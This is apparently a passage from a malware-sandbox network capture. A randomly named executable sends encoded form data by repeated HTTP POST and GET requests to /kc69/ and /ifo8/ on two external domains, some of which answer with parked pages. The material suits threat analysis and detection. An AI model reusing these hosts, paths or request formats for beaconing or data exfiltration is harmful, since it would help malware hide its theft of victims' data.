                      Sep 3, 2024 12:47:14.122904062 CEST599INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMThkYzBjYzgtZjg4My00OTFiLWI2OWQtNWI3MDViNDBlZTVlIiwicGFnZV90aW1lIjoxNzI1MzYwND


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      14192.168.2.449755199.59.243.226801852C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      TimestampBytes transferredDirectionData
                      Sep 3, 2024 12:47:16.228790045 CEST758OUTPOST /kc69/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 221
                      Host: www.asian-massage-us.xyz
                      Origin: http://www.asian-massage-us.xyz
                      Referer: http://www.asian-massage-us.xyz/kc69/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 41 6b 42 6c 30 78 4e 53 47 6b 76 6b 2f 69 52 30 6e 74 31 71 2b 4b 63 49 50 30 46 66 6f 6d 36 6d 6d 30 31 6a 73 69 71 31 44 46 72 79 46 62 4b 4b 5a 6e 74 73 63 52 31 78 74 47 64 6e 6b 6c 48 78 56 31 7a 70 48 6b 64 38 76 4d 48 54 2f 4b 36 61 62 77 57 65 54 72 7a 44 72 2f 6d 41 43 57 6a 59 35 34 77 38 58 48 31 41 62 33 49 79 77 71 6b 75 70 66 37 72 30 71 4b 2b 4f 5a 48 47 72 36 63 6d 56 37 76 66 30 52 4f 55 79 34 41 52 5a 70 4b 59 31 4a 2f 6e 55 45 35 31 78 68 42 54 53 46 52 4a 4b 66 73 55 30 4b 48 68 47 6b 75 52 2f 57 77 56 4b 6d 65 70 62 57 64 44 5a 2f 63 62 67 57 38 75 48 61 4e 57 7a 62 4f 5a 59 70 71 34 4f 6c 6f 35 52 33 58 59 36 62 67 3d
                      Data Ascii: TJY8=AkBl0xNSGkvk/iR0nt1q+KcIP0Ffom6mm01jsiq1DFryFbKKZntscR1xtGdnklHxV1zpHkd8vMHT/K6abwWeTrzDr/mACWjY54w8XH1Ab3Iywqkupf7r0qK+OZHGr6cmV7vf0ROUy4ARZpKY1J/nUE51xhBTSFRJKfsU0KHhGkuR/WwVKmepbWdDZ/cbgW8uHaNWzbOZYpq4Olo5R3XY6bg=
                      Sep 3, 2024 12:47:16.668078899 CEST1236INHTTP/1.1 200 OK
                      date: Tue, 03 Sep 2024 10:47:16 GMT
                      content-type: text/html; charset=utf-8
                      content-length: 1146
                      x-request-id: 1ab84bac-de39-46b5-aa34-cff70f9a11e9
                      cache-control: no-store, max-age=0
                      accept-ch: sec-ch-prefers-color-scheme
                      critical-ch: sec-ch-prefers-color-scheme
                      vary: sec-ch-prefers-color-scheme
                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wlARJhqLmmWVH8b/GDIhwzJzdn45kft3k6Oe/Gu2/ALbm28f2LYsrDNuPhf0t5f499uG0DPZUJsoCIy0MhjZPw==
                      set-cookie: parking_session=1ab84bac-de39-46b5-aa34-cff70f9a11e9; expires=Tue, 03 Sep 2024 11:02:16 GMT; path=/
                      connection: close
                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 77 6c 41 52 4a 68 71 4c 6d 6d 57 56 48 38 62 2f 47 44 49 68 77 7a 4a 7a 64 6e 34 35 6b 66 74 33 6b 36 4f 65 2f 47 75 32 2f 41 4c 62 6d 32 38 66 32 4c 59 73 72 44 4e 75 50 68 66 30 74 35 66 34 39 39 75 47 30 44 50 5a 55 4a 73 6f 43 49 79 30 4d 68 6a 5a 50 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wlARJhqLmmWVH8b/GDIhwzJzdn45kft3k6Oe/Gu2/ALbm28f2LYsrDNuPhf0t5f499uG0DPZUJsoCIy0MhjZPw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                      Sep 3, 2024 12:47:16.668102980 CEST599INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWFiODRiYWMtZGUzOS00NmI1LWFhMzQtY2ZmNzBmOWExMWU5IiwicGFnZV90aW1lIjoxNzI1MzYwND


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      15192.168.2.449756199.59.243.226801852C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      TimestampBytes transferredDirectionData
                      Sep 3, 2024 12:47:18.779081106 CEST10840OUTPOST /kc69/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 10301
                      Host: www.asian-massage-us.xyz
                      Origin: http://www.asian-massage-us.xyz
                      Referer: http://www.asian-massage-us.xyz/kc69/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 41 6b 42 6c 30 78 4e 53 47 6b 76 6b 2f 69 52 30 6e 74 31 71 2b 4b 63 49 50 30 46 66 6f 6d 36 6d 6d 30 31 6a 73 69 71 31 44 46 6a 79 45 74 47 4b 59 45 31 73 66 52 31 78 75 47 64 36 6b 6c 48 4a 56 30 62 74 48 6b 52 47 76 4b 44 54 2f 70 69 61 4b 52 57 65 49 62 7a 44 6e 66 6d 37 4d 32 69 41 35 34 67 67 58 48 46 41 62 33 49 79 77 76 67 75 75 4f 37 72 32 71 4b 39 65 35 48 53 68 61 64 6f 56 37 32 6e 30 52 62 6a 7a 4c 49 52 59 4a 36 59 34 66 72 6e 5a 45 34 54 69 52 41 4f 53 46 63 54 4b 5a 49 32 30 4b 44 62 47 6d 79 52 39 79 5a 33 51 30 4b 2b 66 56 74 39 48 63 77 6a 6f 32 77 33 43 39 4e 31 7a 36 61 2f 4a 61 43 70 49 45 4a 31 42 6c 4c 4e 6c 2b 65 44 51 4a 48 38 6c 63 63 61 42 75 79 50 35 54 4e 47 78 50 47 42 42 6e 42 41 44 55 55 55 37 73 37 61 59 2b 31 38 4e 72 33 7a 66 50 49 4c 59 41 76 77 38 63 58 43 58 37 61 4c 76 4f 4d 6f 4a 55 44 64 4c 56 37 6b 4f 77 5a 67 6d 4a 43 4d 30 6e 6e 6f 33 78 4c 70 66 70 6e 66 7a 57 63 33 57 2b 34 43 5a 66 2b 32 59 54 52 67 75 63 58 6a 70 39 57 4c 75 4b 78 4a 6d [TRUNCATED]
                      Data Ascii: TJY8=AkBl0xNSGkvk/iR0nt1q+KcIP0Ffom6mm01jsiq1DFjyEtGKYE1sfR1xuGd6klHJV0btHkRGvKDT/piaKRWeIbzDnfm7M2iA54ggXHFAb3IywvguuO7r2qK9e5HShadoV72n0RbjzLIRYJ6Y4frnZE4TiRAOSFcTKZI20KDbGmyR9yZ3Q0K+fVt9Hcwjo2w3C9N1z6a/JaCpIEJ1BlLNl+eDQJH8lccaBuyP5TNGxPGBBnBADUUU7s7aY+18Nr3zfPILYAvw8cXCX7aLvOMoJUDdLV7kOwZgmJCM0nno3xLpfpnfzWc3W+4CZf+2YTRgucXjp9WLuKxJmF1BatN1VKrR6A1BekBK2kCG4HOVb2ryhc4r78ZFYX4AwZ8tg6ud9FcFl8tSQ7MdFJ7FeOdKa3mHc3CUNw1voRXAMg8SrwFxz6K5g8d5OvTY5XbtMZnxaJ5c/1l5kuoiPV67bBig6QJJJMScmdUqJ5F/a0+SuU94T8CtKS2UXEzPhuBCU5LW/XRFzbfwsRfiK8LvCrR6bluYGXQMxdqtQi/OxJ0o+gcw/ZMaxrGubDGwW78RvxCCIDVi5JffZIR3JPDI3kzChI+L2XqGP3gKuddlqsWmZ/xYhuFwCkzBJv+gj1x/R5dQZL7psbxwB396mZ8WueC1w4d9l/xD6NCjLd6MgjfjEJodMPu4LzIc/S2ctTAM/1+KaMZPrvkKN3eqxsW/MOKOC4AotrFFrQruJhuMwDYHBofP7b2QZlop+NEsFqtHd/MNX1RRZbtNSA/yPTgLAGNhK4sXLkZQUQG+hH4sKSKIFiNeRCFI24a8W4RcpRsSxZKiZkS+3LrH/RckHbe88ZBqaas7Hk4grUFfAsn0bb4QyIbec6/gEI1mwVMdMcdl1c+/INWN/yRsZmHvUjs83kDfsODoNX7aVXh+lB/R1Ay2acqyIpUZNW7B/jCZgc9ImcwjPVXcxN+jQ/ZgowSjTVFSy5IcdGIQ0WDCcajQKWRR4P0yQQP [TRUNCATED]
                      Sep 3, 2024 12:47:19.220160961 CEST1236INHTTP/1.1 200 OK
                      date: Tue, 03 Sep 2024 10:47:19 GMT
                      content-type: text/html; charset=utf-8
                      content-length: 1146
                      x-request-id: c394b047-f836-4735-9af8-ce8399badc3f
                      cache-control: no-store, max-age=0
                      accept-ch: sec-ch-prefers-color-scheme
                      critical-ch: sec-ch-prefers-color-scheme
                      vary: sec-ch-prefers-color-scheme
                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wlARJhqLmmWVH8b/GDIhwzJzdn45kft3k6Oe/Gu2/ALbm28f2LYsrDNuPhf0t5f499uG0DPZUJsoCIy0MhjZPw==
                      set-cookie: parking_session=c394b047-f836-4735-9af8-ce8399badc3f; expires=Tue, 03 Sep 2024 11:02:19 GMT; path=/
                      connection: close
                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 77 6c 41 52 4a 68 71 4c 6d 6d 57 56 48 38 62 2f 47 44 49 68 77 7a 4a 7a 64 6e 34 35 6b 66 74 33 6b 36 4f 65 2f 47 75 32 2f 41 4c 62 6d 32 38 66 32 4c 59 73 72 44 4e 75 50 68 66 30 74 35 66 34 39 39 75 47 30 44 50 5a 55 4a 73 6f 43 49 79 30 4d 68 6a 5a 50 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wlARJhqLmmWVH8b/GDIhwzJzdn45kft3k6Oe/Gu2/ALbm28f2LYsrDNuPhf0t5f499uG0DPZUJsoCIy0MhjZPw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                      Sep 3, 2024 12:47:19.220181942 CEST599INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzM5NGIwNDctZjgzNi00NzM1LTlhZjgtY2U4Mzk5YmFkYzNmIiwicGFnZV90aW1lIjoxNzI1MzYwND


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      16192.168.2.449757199.59.243.226801852C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      TimestampBytes transferredDirectionData
                      Sep 3, 2024 12:47:21.326735973 CEST460OUTGET /kc69/?TJY8=NmpF3EhDDWuD2jtxofhf+uMKfjRAnSqtmyJn51mvGwf0ZsSxS3FqZkMY4E4Bhni9ZRnQKXdCwf/FxLiQBiKGPfCZkMeDDDW6mIEhSXgEQREY6q1xuM7O6IY=&3L7=cfJLLBshpRPDzp HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Language: en-us
                      Connection: close
                      Host: www.asian-massage-us.xyz
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Sep 3, 2024 12:47:21.773591995 CEST1236INHTTP/1.1 200 OK
                      date: Tue, 03 Sep 2024 10:47:21 GMT
                      content-type: text/html; charset=utf-8
                      content-length: 1482
                      x-request-id: 9936824a-4311-41ca-b5a7-2eda1617f8a0
                      cache-control: no-store, max-age=0
                      accept-ch: sec-ch-prefers-color-scheme
                      critical-ch: sec-ch-prefers-color-scheme
                      vary: sec-ch-prefers-color-scheme
                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_IuHzO4p84Ftc510bj39wW/bOL9zCkCimy9EWNedPf31lo0YBtO16S25MDQptOSunFX5lxeSgyXLGQ6pQxo1egg==
                      set-cookie: parking_session=9936824a-4311-41ca-b5a7-2eda1617f8a0; expires=Tue, 03 Sep 2024 11:02:21 GMT; path=/
                      connection: close
                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 49 75 48 7a 4f 34 70 38 34 46 74 63 35 31 30 62 6a 33 39 77 57 2f 62 4f 4c 39 7a 43 6b 43 69 6d 79 39 45 57 4e 65 64 50 66 33 31 6c 6f 30 59 42 74 4f 31 36 53 32 35 4d 44 51 70 74 4f 53 75 6e 46 58 35 6c 78 65 53 67 79 58 4c 47 51 36 70 51 78 6f 31 65 67 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_IuHzO4p84Ftc510bj39wW/bOL9zCkCimy9EWNedPf31lo0YBtO16S25MDQptOSunFX5lxeSgyXLGQ6pQxo1egg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                      Sep 3, 2024 12:47:21.773606062 CEST935INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTkzNjgyNGEtNDMxMS00MWNhLWI1YTctMmVkYTE2MTdmOGEwIiwicGFnZV90aW1lIjoxNzI1MzYwND


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      17192.168.2.4497585.144.130.52801852C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      TimestampBytes transferredDirectionData
                      Sep 3, 2024 12:47:34.948638916 CEST720OUTPOST /ifo8/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 201
                      Host: www.aflaksokna.com
                      Origin: http://www.aflaksokna.com
                      Referer: http://www.aflaksokna.com/ifo8/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 37 57 67 70 66 49 44 34 6f 46 59 35 44 74 68 68 78 39 59 6e 76 50 43 53 54 59 6b 6f 44 31 35 7a 45 57 6d 43 79 65 63 50 57 51 74 65 48 63 65 46 7a 74 30 51 64 71 45 73 49 48 74 62 57 38 72 64 70 76 35 4c 67 30 41 47 63 63 38 71 47 47 4d 75 52 68 77 39 69 65 79 4e 53 30 66 47 2f 57 57 4a 55 33 54 47 38 4c 58 53 76 4c 74 50 58 49 39 59 68 44 42 48 7a 69 64 44 36 4f 49 65 45 37 4a 41 48 36 4a 32 4d 54 41 58 75 39 46 61 46 4a 78 36 55 33 52 56 38 70 45 70 35 69 31 66 4b 70 63 2f 51 67 77 37 77 58 41 2f 7a 41 30 70 70 30 57 59 2b 71 42 72 6c 36 45 36 74 65 36 7a 75 46 74 51 5a 77 3d 3d
                      Data Ascii: TJY8=7WgpfID4oFY5Dthhx9YnvPCSTYkoD15zEWmCyecPWQteHceFzt0QdqEsIHtbW8rdpv5Lg0AGcc8qGGMuRhw9ieyNS0fG/WWJU3TG8LXSvLtPXI9YhDBHzidD6OIeE7JAH6J2MTAXu9FaFJx6U3RV8pEp5i1fKpc/Qgw7wXA/zA0pp0WY+qBrl6E6te6zuFtQZw==


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      18192.168.2.4497595.144.130.52801852C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      TimestampBytes transferredDirectionData
                      Sep 3, 2024 12:47:37.507653952 CEST740OUTPOST /ifo8/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 221
                      Host: www.aflaksokna.com
                      Origin: http://www.aflaksokna.com
                      Referer: http://www.aflaksokna.com/ifo8/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 37 57 67 70 66 49 44 34 6f 46 59 35 44 4d 52 68 33 65 41 6e 6e 50 43 54 50 6f 6b 6f 4e 56 35 6f 45 57 71 43 79 63 78 43 56 6c 39 65 48 35 61 46 79 73 30 51 65 71 45 73 44 6e 74 65 5a 63 72 73 70 76 38 6f 67 78 34 47 63 63 34 71 47 44 6f 75 52 53 49 79 6a 4f 79 50 61 55 66 49 37 57 57 4a 55 33 54 47 38 4c 54 6f 76 4c 31 50 57 34 4e 59 75 47 74 41 36 43 64 41 7a 75 49 65 54 72 4a 45 48 36 4a 49 4d 53 73 78 75 37 5a 61 46 49 42 36 55 6b 4a 57 7a 70 45 6e 39 69 30 51 47 59 31 4b 5a 78 31 48 76 30 6f 6e 30 7a 34 31 6f 79 48 43 76 62 67 38 33 36 67 4a 77 5a 7a 48 6a 47 51 5a 43 35 78 30 65 56 56 31 57 73 50 4a 6a 58 64 75 30 38 50 50 75 59 6b 3d
                      Data Ascii: TJY8=7WgpfID4oFY5DMRh3eAnnPCTPokoNV5oEWqCycxCVl9eH5aFys0QeqEsDnteZcrspv8ogx4Gcc4qGDouRSIyjOyPaUfI7WWJU3TG8LTovL1PW4NYuGtA6CdAzuIeTrJEH6JIMSsxu7ZaFIB6UkJWzpEn9i0QGY1KZx1Hv0on0z41oyHCvbg836gJwZzHjGQZC5x0eVV1WsPJjXdu08PPuYk=


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      19192.168.2.4497605.144.130.52801852C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      TimestampBytes transferredDirectionData
                      Sep 3, 2024 12:47:40.059210062 CEST10822OUTPOST /ifo8/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-us
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: max-age=0
                      Content-Length: 10301
                      Host: www.aflaksokna.com
                      Origin: http://www.aflaksokna.com
                      Referer: http://www.aflaksokna.com/ifo8/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                      Data Raw: 54 4a 59 38 3d 37 57 67 70 66 49 44 34 6f 46 59 35 44 4d 52 68 33 65 41 6e 6e 50 43 54 50 6f 6b 6f 4e 56 35 6f 45 57 71 43 79 63 78 43 56 6d 64 65 48 76 6d 46 79 50 73 51 66 71 45 73 64 58 74 66 5a 63 72 31 70 76 45 30 67 78 6b 57 63 65 77 71 46 68 67 75 58 6e 6b 79 70 4f 79 50 57 30 66 4a 2f 57 57 6d 55 7a 33 43 38 49 37 6f 76 4c 31 50 57 37 56 59 71 54 42 41 32 69 64 44 36 4f 49 6f 45 37 4a 6f 48 36 67 77 4d 53 6f 48 75 4e 70 61 43 6f 52 36 53 58 74 57 36 70 45 6c 78 43 31 50 47 59 70 6a 5a 31 55 32 76 31 63 64 30 30 77 31 72 32 2b 6f 79 76 56 71 6b 70 67 4f 75 70 53 73 37 6e 77 6f 42 4c 39 65 61 6e 64 4c 4d 6f 37 6c 6f 48 63 42 68 65 54 52 78 65 67 49 47 33 56 45 6c 65 72 43 41 42 7a 2b 4b 45 67 35 49 57 30 55 7a 5a 78 65 77 61 4c 4c 6e 34 62 4b 47 44 6f 52 41 52 39 7a 36 4e 6d 4e 70 30 57 75 36 51 70 5a 37 67 41 49 2b 74 4a 36 65 78 42 71 75 42 41 70 76 65 4d 63 6e 6f 75 5a 44 49 70 4b 36 39 4c 6c 7a 4d 6a 4a 68 77 46 73 6b 62 4f 55 46 42 78 45 43 62 39 30 45 76 64 69 53 4b 37 47 47 38 62 36 47 [TRUNCATED]
                      Data Ascii: TJY8=7WgpfID4oFY5DMRh3eAnnPCTPokoNV5oEWqCycxCVmdeHvmFyPsQfqEsdXtfZcr1pvE0gxkWcewqFhguXnkypOyPW0fJ/WWmUz3C8I7ovL1PW7VYqTBA2idD6OIoE7JoH6gwMSoHuNpaCoR6SXtW6pElxC1PGYpjZ1U2v1cd00w1r2+oyvVqkpgOupSs7nwoBL9eandLMo7loHcBheTRxegIG3VElerCABz+KEg5IW0UzZxewaLLn4bKGDoRAR9z6NmNp0Wu6QpZ7gAI+tJ6exBquBApveMcnouZDIpK69LlzMjJhwFskbOUFBxECb90EvdiSK7GG8b6G7os/Wi1fnHsWOyUnHKBs2TFWDkWnNWAslH9MxbgbsvefO8HpAmCRCCBiQ9mhgishz2QFAzIDobfP4ywaQ2qX1l7HEfvobXtGsZnvBvKYawcS2tUb0sgKef2ykbLY5h9nS3n5wzNDhTx5l0ZEV9Xlkgt9u2S0JjiYcBS65tPPoNOgKn4xfGzMKVIY1u9AtDf+Cc7agoFBsTBQvV3pFnS8E0zYYaPCzg2WUYoZW7HZF1cohGY58uwt3UYmwkfqmj4IaAZAM2korbYEkqK1robqpoiCXXN+zH4qWCqQe71Ks5vLtMWm0/R/dTzRmORUogr7uFkzqgoX+5IQeMoeeMahfy2yCC99pLZuc/HPBvdqTYnFNDxMk5ItEZeTXIjw3Tkw6SXeDD/Tlgz7f1l4ex0BXPwjiSuQI1eQKyrE4SFFE73Jpe0kQgrrPkWC9bHpDSujHRb5yvAxfWw+GxWobKWIBZwO5uprClRjkei83lBRQeUeddktfItRgZ19ucuK2EgL3rXDjXNRt1es2jvGTuIeNQ9Lvpq